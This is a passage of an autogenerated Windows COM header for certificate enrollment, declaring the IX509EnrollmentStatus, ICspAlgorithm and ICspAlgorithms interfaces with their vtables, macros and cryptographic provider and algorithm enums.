extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0005_v0_0_s_ifspec;

#ifndef __IX509EnrollmentStatus_INTERFACE_DEFINED__
#define __IX509EnrollmentStatus_INTERFACE_DEFINED__

/* interface IX509EnrollmentStatus */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509EnrollmentStatus;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab304-217d-11da-b2a4-000e7bbb2b09")
    IX509EnrollmentStatus : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE AppendText( 
            /* [in] */ __RPC__in BSTR strText) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Text( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Text( 
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Selected( 
            /* [retval][out] */ __RPC__out EnrollmentSelectionStatus *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Selected( 
            /* [in] */ EnrollmentSelectionStatus Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Display( 
            /* [retval][out] */ __RPC__out EnrollmentDisplayStatus *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Display( 
            /* [in] */ EnrollmentDisplayStatus Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Status( 
            /* [retval][out] */ __RPC__out EnrollmentEnrollStatus *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Status( 
            /* [in] */ EnrollmentEnrollStatus Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Error( 
            /* [retval][out] */ __RPC__out HRESULT *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Error( 
            /* [in] */ HRESULT Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ErrorText( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509EnrollmentStatusVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509EnrollmentStatus * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509EnrollmentStatus * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509EnrollmentStatus * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509EnrollmentStatus * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509EnrollmentStatus * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509EnrollmentStatus * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509EnrollmentStatus * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *AppendText )( 
            __RPC__in IX509EnrollmentStatus * This,
            /* [in] */ __RPC__in BSTR strText);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Text )( 
            __RPC__in IX509EnrollmentStatus * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Text )( 
            __RPC__in IX509EnrollmentStatus * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Selected )( 
            __RPC__in IX509EnrollmentStatus * This,
            /* [retval][out] */ __RPC__out EnrollmentSelectionStatus *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Selected )( 
            __RPC__in IX509EnrollmentStatus * This,
            /* [in] */ EnrollmentSelectionStatus Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Display )( 
            __RPC__in IX509EnrollmentStatus * This,
            /* [retval][out] */ __RPC__out EnrollmentDisplayStatus *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Display )( 
            __RPC__in IX509EnrollmentStatus * This,
            /* [in] */ EnrollmentDisplayStatus Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Status )( 
            __RPC__in IX509EnrollmentStatus * This,
            /* [retval][out] */ __RPC__out EnrollmentEnrollStatus *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Status )( 
            __RPC__in IX509EnrollmentStatus * This,
            /* [in] */ EnrollmentEnrollStatus Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Error )( 
            __RPC__in IX509EnrollmentStatus * This,
            /* [retval][out] */ __RPC__out HRESULT *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Error )( 
            __RPC__in IX509EnrollmentStatus * This,
            /* [in] */ HRESULT Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ErrorText )( 
            __RPC__in IX509EnrollmentStatus * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } IX509EnrollmentStatusVtbl;

    interface IX509EnrollmentStatus
    {
        CONST_VTBL struct IX509EnrollmentStatusVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509EnrollmentStatus_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509EnrollmentStatus_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509EnrollmentStatus_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509EnrollmentStatus_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509EnrollmentStatus_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509EnrollmentStatus_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509EnrollmentStatus_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509EnrollmentStatus_AppendText(This,strText)	\
    ( (This)->lpVtbl -> AppendText(This,strText) ) 

#define IX509EnrollmentStatus_get_Text(This,pValue)	\
    ( (This)->lpVtbl -> get_Text(This,pValue) ) 

#define IX509EnrollmentStatus_put_Text(This,Value)	\
    ( (This)->lpVtbl -> put_Text(This,Value) ) 

#define IX509EnrollmentStatus_get_Selected(This,pValue)	\
    ( (This)->lpVtbl -> get_Selected(This,pValue) ) 

#define IX509EnrollmentStatus_put_Selected(This,Value)	\
    ( (This)->lpVtbl -> put_Selected(This,Value) ) 

#define IX509EnrollmentStatus_get_Display(This,pValue)	\
    ( (This)->lpVtbl -> get_Display(This,pValue) ) 

#define IX509EnrollmentStatus_put_Display(This,Value)	\
    ( (This)->lpVtbl -> put_Display(This,Value) ) 

#define IX509EnrollmentStatus_get_Status(This,pValue)	\
    ( (This)->lpVtbl -> get_Status(This,pValue) ) 

#define IX509EnrollmentStatus_put_Status(This,Value)	\
    ( (This)->lpVtbl -> put_Status(This,Value) ) 

#define IX509EnrollmentStatus_get_Error(This,pValue)	\
    ( (This)->lpVtbl -> get_Error(This,pValue) ) 

#define IX509EnrollmentStatus_put_Error(This,Value)	\
    ( (This)->lpVtbl -> put_Error(This,Value) ) 

#define IX509EnrollmentStatus_get_ErrorText(This,pValue)	\
    ( (This)->lpVtbl -> get_ErrorText(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509EnrollmentStatus_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0006 */
/* [local] */ 

typedef 
enum X509ProviderType
    {
        XCN_PROV_NONE	= 0,
        XCN_PROV_RSA_FULL	= 1,
        XCN_PROV_RSA_SIG	= 2,
        XCN_PROV_DSS	= 3,
        XCN_PROV_FORTEZZA	= 4,
        XCN_PROV_MS_EXCHANGE	= 5,
        XCN_PROV_SSL	= 6,
        XCN_PROV_RSA_SCHANNEL	= 12,
        XCN_PROV_DSS_DH	= 13,
        XCN_PROV_EC_ECDSA_SIG	= 14,
        XCN_PROV_EC_ECNRA_SIG	= 15,
        XCN_PROV_EC_ECDSA_FULL	= 16,
        XCN_PROV_EC_ECNRA_FULL	= 17,
        XCN_PROV_DH_SCHANNEL	= 18,
        XCN_PROV_SPYRUS_LYNKS	= 20,
        XCN_PROV_RNG	= 21,
        XCN_PROV_INTEL_SEC	= 22,
        XCN_PROV_REPLACE_OWF	= 23,
        XCN_PROV_RSA_AES	= 24
    } 	X509ProviderType;

// XCN_BCRYPT_SIGNATURE_INTERFACE: RSA, DSA, ECDSA_P* signature
// XCN_BCRYPT_ASYMMETRIC_ENCRYPTION_INTERFACE: RSA encryption
// XCN_BCRYPT_CIPHER_INTERFACE: RC2, RC4, DES, 3DES, AES symmetric encryption
// XCN_BCRYPT_HASH_INTERFACE: MD2, MD4, SHA1, SHA256, SHA384, SHA512 MAC, HMAC Hash
// XCN_BCRYPT_SECRET_AGREEMENT_INTERFACE: DH, ECDH_P* key agreement
// XCN_BCRYPT_RNG_INTERFACE: RNG
typedef 
enum AlgorithmType
    {
        XCN_BCRYPT_UNKNOWN_INTERFACE	= 0,
        XCN_BCRYPT_SIGNATURE_INTERFACE	= 0x5,
        XCN_BCRYPT_ASYMMETRIC_ENCRYPTION_INTERFACE	= 0x3,
        XCN_BCRYPT_CIPHER_INTERFACE	= 0x1,
        XCN_BCRYPT_HASH_INTERFACE	= 0x2,
        XCN_BCRYPT_SECRET_AGREEMENT_INTERFACE	= 0x4,
        XCN_BCRYPT_RNG_INTERFACE	= 0x6
    } 	AlgorithmType;

typedef 
enum AlgorithmOperationFlags
    {
        XCN_NCRYPT_NO_OPERATION	= 0,
        XCN_NCRYPT_CIPHER_OPERATION	= 0x1,
        XCN_NCRYPT_HASH_OPERATION	= 0x2,
        XCN_NCRYPT_ASYMMETRIC_ENCRYPTION_OPERATION	= 0x4,
        XCN_NCRYPT_SECRET_AGREEMENT_OPERATION	= 0x8,
        XCN_NCRYPT_SIGNATURE_OPERATION	= 0x10,
        XCN_NCRYPT_RNG_OPERATION	= 0x20,
        XCN_NCRYPT_ANY_ASYMMETRIC_OPERATION	= ( ( 0x4 | 0x8 )  | 0x10 ) ,
        XCN_NCRYPT_PREFER_SIGNATURE_ONLY_OPERATION	= 0x200000,
        XCN_NCRYPT_PREFER_NON_SIGNATURE_OPERATION	= 0x400000,
        XCN_NCRYPT_EXACT_MATCH_OPERATION	= 0x800000,
        XCN_NCRYPT_PREFERENCE_MASK_OPERATION	= 0xe00000
    } 	AlgorithmOperationFlags;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0006_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0006_v0_0_s_ifspec;

#ifndef __ICspAlgorithm_INTERFACE_DEFINED__
#define __ICspAlgorithm_INTERFACE_DEFINED__

/* interface ICspAlgorithm */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICspAlgorithm;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab305-217d-11da-b2a4-000e7bbb2b09")
    ICspAlgorithm : public IDispatch
    {
    public:
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE GetAlgorithmOid( 
            /* [in] */ LONG Length,
            /* [in] */ AlgorithmFlags AlgFlags,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_DefaultLength( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_IncrementLength( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_LongName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Valid( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_MaxLength( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_MinLength( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_Name( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_Type( 
            /* [retval][out] */ __RPC__out AlgorithmType *pValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_Operations( 
            /* [retval][out] */ __RPC__out AlgorithmOperationFlags *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICspAlgorithmVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICspAlgorithm * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICspAlgorithm * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICspAlgorithm * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICspAlgorithm * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICspAlgorithm * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICspAlgorithm * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICspAlgorithm * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *GetAlgorithmOid )( 
            __RPC__in ICspAlgorithm * This,
            /* [in] */ LONG Length,
            /* [in] */ AlgorithmFlags AlgFlags,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_DefaultLength )( 
            __RPC__in ICspAlgorithm * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_IncrementLength )( 
            __RPC__in ICspAlgorithm * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_LongName )( 
            __RPC__in ICspAlgorithm * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Valid )( 
            __RPC__in ICspAlgorithm * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_MaxLength )( 
            __RPC__in ICspAlgorithm * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_MinLength )( 
            __RPC__in ICspAlgorithm * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Name )( 
            __RPC__in ICspAlgorithm * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Type )( 
            __RPC__in ICspAlgorithm * This,
            /* [retval][out] */ __RPC__out AlgorithmType *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Operations )( 
            __RPC__in ICspAlgorithm * This,
            /* [retval][out] */ __RPC__out AlgorithmOperationFlags *pValue);
        
        END_INTERFACE
    } ICspAlgorithmVtbl;

    interface ICspAlgorithm
    {
        CONST_VTBL struct ICspAlgorithmVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICspAlgorithm_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICspAlgorithm_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICspAlgorithm_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICspAlgorithm_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICspAlgorithm_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICspAlgorithm_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICspAlgorithm_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICspAlgorithm_GetAlgorithmOid(This,Length,AlgFlags,ppValue)	\
    ( (This)->lpVtbl -> GetAlgorithmOid(This,Length,AlgFlags,ppValue) ) 

#define ICspAlgorithm_get_DefaultLength(This,pValue)	\
    ( (This)->lpVtbl -> get_DefaultLength(This,pValue) ) 

#define ICspAlgorithm_get_IncrementLength(This,pValue)	\
    ( (This)->lpVtbl -> get_IncrementLength(This,pValue) ) 

#define ICspAlgorithm_get_LongName(This,pValue)	\
    ( (This)->lpVtbl -> get_LongName(This,pValue) ) 

#define ICspAlgorithm_get_Valid(This,pValue)	\
    ( (This)->lpVtbl -> get_Valid(This,pValue) ) 

#define ICspAlgorithm_get_MaxLength(This,pValue)	\
    ( (This)->lpVtbl -> get_MaxLength(This,pValue) ) 

#define ICspAlgorithm_get_MinLength(This,pValue)	\
    ( (This)->lpVtbl -> get_MinLength(This,pValue) ) 

#define ICspAlgorithm_get_Name(This,pValue)	\
    ( (This)->lpVtbl -> get_Name(This,pValue) ) 

#define ICspAlgorithm_get_Type(This,pValue)	\
    ( (This)->lpVtbl -> get_Type(This,pValue) ) 

#define ICspAlgorithm_get_Operations(This,pValue)	\
    ( (This)->lpVtbl -> get_Operations(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICspAlgorithm_INTERFACE_DEFINED__ */


#ifndef __ICspAlgorithms_INTERFACE_DEFINED__
#define __ICspAlgorithms_INTERFACE_DEFINED__

/* interface ICspAlgorithms */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICspAlgorithms;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab306-217d-11da-b2a4-000e7bbb2b09")
    ICspAlgorithms : public IDispatch
    {
    public:
        virtual /* [helpstring][id][propget][custom] */ HRESULT STDMETHODCALLTYPE get_ItemByIndex( 
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt ICspAlgorithm **pVal) = 0;
        
        virtual /* [helpstring][id][propget][custom] */ HRESULT STDMETHODCALLTYPE get_Count( 
            /* [retval][out] */ __RPC__out long *pVal) = 0;
        
        virtual /* [restricted][helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get__NewEnum( 
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal) = 0;
        
        virtual /* [helpstring][id][custom] */ HRESULT STDMETHODCALLTYPE Add( 
            /* [in] */ __RPC__in_opt ICspAlgorithm *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Remove( 
            /* [in] */ LONG Index) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Clear( void) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_ItemByName( 
            /* [in] */ __RPC__in BSTR strName,
            /* [retval][out] */ __RPC__deref_out_opt ICspAlgorithm **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_IndexByObjectId( 
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [retval][out] */ __RPC__out LONG *pIndex) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICspAlgorithmsVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICspAlgorithms * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICspAlgorithms * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICspAlgorithms * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICspAlgorithms * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICspAlgorithms * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICspAlgorithms * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICspAlgorithms * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [helpstring][id][propget][custom] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByIndex )( 
            __RPC__in ICspAlgorithms * This,
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt ICspAlgorithm **pVal);
        
        /* [helpstring][id][propget][custom] */ HRESULT ( STDMETHODCALLTYPE *get_Count )( 
            __RPC__in ICspAlgorithms * This,
            /* [retval][out] */ __RPC__out long *pVal);
        
        /* [restricted][helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get__NewEnum )( 
            __RPC__in ICspAlgorithms * This,
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal);
        
        /* [helpstring][id][custom] */ HRESULT ( STDMETHODCALLTYPE *Add )( 
            __RPC__in ICspAlgorithms * This,
            /* [in] */ __RPC__in_opt ICspAlgorithm *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Remove )( 
            __RPC__in ICspAlgorithms * This,
            /* [in] */ LONG Index);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Clear )( 
            __RPC__in ICspAlgorithms * This);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByName )( 
            __RPC__in ICspAlgorithms * This,
            /* [in] */ __RPC__in BSTR strName,
            /* [retval][out] */ __RPC__deref_out_opt ICspAlgorithm **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_IndexByObjectId )( 
            __RPC__in ICspAlgorithms * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [retval][out] */ __RPC__out LONG *pIndex);
        
        END_INTERFACE
    } ICspAlgorithmsVtbl;

    interface ICspAlgorithms
    {
        CONST_VTBL struct ICspAlgorithmsVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICspAlgorithms_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICspAlgorithms_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICspAlgorithms_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICspAlgorithms_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICspAlgorithms_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICspAlgorithms_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICspAlgorithms_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICspAlgorithms_get_ItemByIndex(This,Index,pVal)	\
    ( (This)->lpVtbl -> get_ItemByIndex(This,Index,pVal) ) 

#define ICspAlgorithms_get_Count(This,pVal)	\
    ( (This)->lpVtbl -> get_Count(This,pVal) ) 

#define ICspAlgorithms_get__NewEnum(This,pVal)	\
    ( (This)->lpVtbl -> get__NewEnum(This,pVal) ) 

#define ICspAlgorithms_Add(This,pVal)	\
    ( (This)->lpVtbl -> Add(This,pVal) ) 

#define ICspAlgorithms_Remove(This,Index)	\
    ( (This)->lpVtbl -> Remove(This,Index) ) 

#define ICspAlgorithms_Clear(This)	\
    ( (This)->lpVtbl -> Clear(This) ) 

#define ICspAlgorithms_get_ItemByName(This,strName,ppValue)	\
    ( (This)->lpVtbl -> get_ItemByName(This,strName,ppValue) ) 

#define ICspAlgorithms_get_IndexByObjectId(This,pObjectId,pIndex)	\
    ( (This)->lpVtbl -> get_IndexByObjectId(This,pObjectId,pIndex) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICspAlgorithms_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0008 */
/* [local] */ 

typedef 
enum X509KeySpec
    {
        XCN_AT_NONE	= 0,
        XCN_AT_KEYEXCHANGE	= 1,
        XCN_AT_SIGNATURE	= 2
    } 	X509KeySpec;





extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0008_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0008_v0_0_s_ifspec;

#ifndef __ICspInformation_INTERFACE_DEFINED__
#define __ICspInformation_INTERFACE_DEFINED__

/* interface ICspInformation */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICspInformation;

